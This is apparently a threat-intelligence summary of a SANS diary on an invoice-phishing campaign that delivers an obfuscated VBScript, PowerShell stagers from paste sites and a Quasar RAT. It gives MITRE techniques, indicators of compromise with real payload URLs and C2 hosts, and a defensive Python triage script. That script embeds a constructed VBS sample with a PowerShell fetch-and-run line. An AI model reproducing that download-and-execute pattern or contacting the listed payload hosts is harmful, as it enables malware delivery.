A fake-invoice phishing email delivers a heavily obfuscated VBScript payload, which then stages additional PowerShell-based components and a Quasar RAT from remote sites. The operation relies on a typosquatted domain, a file share hosted on a NameCheap PrivateEmail account, and multiple stages of payload downloads to establish C2. #Quasar #Venom #alpineaerospace #NameCheap #PrivateEmail #VBScript #PowerShell
Keypoints
- The attack begins with a spearphishing email referencing a fake due invoice; the invoice icon points to a URL that leads to a shared file rather than the usual fake login page.
- A shared VBS file named INV.10931.vbs is hosted on a NameCheap PrivateEmail drive and was last modified by the attacker using an address like [email protected].
- The VBS is heavily obfuscated: the file is Unicode encoded (starting with 0xFFEE) and contains junk code to hinder analysis.
- The script uses PowerShell and WScript.Shell to decode and execute additional payloads downloaded from pastebin and pasteio.
- A Quasar RAT payload is downloaded and configured, with a C2 setup that includes local and remote endpoints.
- Typosquatting and domain impersonation (alpineaerospace.com/alpinearospace) are used to host and distribute the malware payloads via compromised domains.
MITRE Techniques
- [T1566.002] Phishing – Spearphishing Link – The attack used an email referencing a fake due invoice that pointed to a URL. Quote: ‘The invoice icon pointed to a URL. Usually, such URLs display a fake login page asking for credentials. Not this time.’
- [T1059.005] VBScript – The malicious script INV.10931.vbs is delivered and executed as a VBScript payload. Quote: ‘This file uses a lot of obfuscation techniques! The first one is the encoding.’
- [T1027] Obfuscated/Compressed Files and Information – The VBScript is heavily obfuscated with Unicode encoding and junk code to hinder analysis. Quote: ‘Starting with 0xFFEE, the file is Unicode encoded.’
- [T1059.001] PowerShell – The script uses PowerShell to decode and run payloads (e.g., ‘powershell -command …’). Quote: ‘powershell -command $KByHL;’
- [T1105] Ingress Tool Transfer – The malware downloads additional payloads from remote sources (e.g., pastebin). Quote: ‘Another Base64 data is downloaded from pastebin.com.’
- [T1071.001] Web Protocols – The C2 configuration shows endpoints used for command and control (e.g., ‘c2’: [ “127.0.0.1:4782”, “venomia[.]ddns[.]net:3202” ]). Quote: ‘{ “c2”: [ “127.0.0.1:4782”, “venomia[.]ddns[.]net:3202” ], “attr”: { … } }’
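As an added triage helper (not code from the ISC diary or the sample it analyses), the script below does what an analyst would do first with a script like INV.10931.vbs: detect the UTF-16 byte-order mark, decode the text, and pull out the WScript.Shell usage, the `powershell -command` invocation and any paste-site URLs. The VBS sample it runs on is constructed here to mirror the structure described above, not the real payload.

```python
import re

# Constructed sample: a UTF-16 LE encoded VBScript (BOM bytes FF FE) that
# stores a PowerShell download string in a variable and runs it through
# WScript.Shell, as the diary describes. This is NOT the real INV.10931.vbs.
SAMPLE_VBS = b"\xff\xfe" + (
    "Dim KByHL\r\n"
    "KByHL = \"(New-Object Net.WebClient).DownloadString("
    "'https://pastebin.com/raw/EXAMPLE')\"\r\n"
    "Set sh = CreateObject(\"WScript.Shell\")\r\n"
    "sh.Run \"powershell -command \" & KByHL, 0, False\r\n"
).encode("utf-16-le")

PASTE_SITES = ("pastebin.com", "pasteio.com")  # sources named in the diary


def decode_script(raw):
    """Return (encoding, text). Handles UTF-16 BOMs, else treats input as ANSI."""
    if raw.startswith(b"\xff\xfe"):
        return "utf-16-le", raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(b"\xfe\xff"):
        return "utf-16-be", raw[2:].decode("utf-16-be", errors="replace")
    return "ansi", raw.decode("latin-1")


def triage(raw):
    """Decode a VBS blob and extract the indicators an analyst wants first."""
    enc, text = decode_script(raw)
    urls = re.findall(r"https?://[^\s'\"<>]+", text)
    return {
        "encoding": enc,
        "uses_wscript_shell": bool(re.search(r"WScript\.Shell", text, re.I)),
        # Everything from 'powershell' up to the closing VBS string quote.
        "powershell_invocations": re.findall(r"powershell[^\"\r\n]*", text, re.I),
        "urls": urls,
        "paste_site_urls": [u for u in urls
                            if any(s in u.lower() for s in PASTE_SITES)],
    }


def is_suspicious(report):
    """Flag the combination seen in this campaign: shell object + PowerShell + paste site."""
    return (report["uses_wscript_shell"]
            and bool(report["powershell_invocations"])
            and bool(report["paste_site_urls"]))


if __name__ == "__main__":
    rep = triage(SAMPLE_VBS)
    for key, value in rep.items():
        print(f"{key}: {value}")
    print("suspicious:", is_suspicious(rep))
```

Point it at a real file with `triage(open(path, "rb").read())`; the URL list is what you pivot on for blocking and retro-hunting in proxy logs.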
Indicators of Compromise
- [File name] INV.10931.vbs – The malicious VBScript payload referenced by the shared file.
- [File hash] 980b05b8a4ccbb444da3f7a1174e4c0e902a8ed199e4af2f3153e320809ab7cc – SHA-256 for INV.10931.vbs.
- [Domain] alpineaerospace.com, alpinearospace.com – Typosquatted/impersonation domains used for hosting the drop.
- [Email] [email protected] – Attacker-provided modification contact for the VBS file.
- [URL] https://pastebin.com/raw/PUgmUTiH, https://pasteio.com/download/xVCDFXTnRsmj – External payload sources referenced by the script.
- [IP address] 127.0.0.1:4782 – Local C2 endpoint observed in the Quasar RAT config.
- [Domain] venomia.ddns.net:3202 – Remote C2 endpoint observed in the Quasar RAT config.
Read more: https://isc.sans.edu/diary/rss/29956